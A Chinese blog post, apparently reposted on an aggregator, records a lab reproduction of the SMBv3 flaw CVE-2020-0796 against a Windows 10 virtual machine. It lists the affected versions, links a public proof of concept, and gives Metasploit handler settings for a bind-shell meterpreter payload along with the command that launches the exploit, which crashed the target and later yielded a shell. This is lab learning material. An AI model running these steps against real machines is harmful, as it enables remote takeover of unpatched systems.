CVE - 2020- 0796复现

Posted this-is-y

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CVE - 2020- 0796复现相关的知识,希望对你有一定的参考价值。

复现过程参考:https://xz.aliyun.com/t/7440

https://www.lstazl.com/cve-2020-0796%E5%BE%AE%E8%BD%AF-smbv3%E5%8D%8F%E8%AE%AE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

下载,安装win10虚拟机。受影响win10版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
只影响 SMB v3.1.1,1903和1909

 

关闭自动更新,关闭防火墙

ipconfig确认ip:192.168.229.131

技术图片

 

 下载漏洞检查工具,这里用的exe版本(奇安信

允许,检测,存在漏洞。

技术图片

在调整了一下后

靶机win10:192.168.87.128

攻击kali:192.168.87.130

(因为物理机没法执行,所以转战虚拟机)


蓝屏/提权poc :https://github.com/dacade/CVE-POC/tree/master/CVE-2020-0796

kali一个终端打开msf,

use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set lport 3333(POC默认为3333端口)

set rhost 192.168.87.128

run

技术图片

 然后在那边执行POC

python exploit.py 192.168.87.128

技术图片

 回到win10虚拟机,就可以看到蓝屏了。

技术图片

然后隔壁老王告诉我,执行这个脚本,当目标靶机内存比较小(我这时候设置的4G)就会出现蓝屏,设置高一点(同时脸不要这么黑)

之后调整了一下,把win10靶机设为8G内存,就成功拿到了shell

技术图片

 

以上是关于CVE - 2020- 0796复现的主要内容,如果未能解决你的问题,请参考以下文章

CVE-2020-0796永恒之黑复现POC EXP以及修复方案

永恒之黑(CVE-2020-0796 微软SMBv3协议远程代码执行漏洞)

永恒之黑(CVE-2020-0796 微软SMBv3协议远程代码执行漏洞)

永恒之黑(CVE-2020-0796 微软SMBv3协议远程代码执行漏洞)

永恒之黑漏洞复现

CVE-2020-15778漏洞复现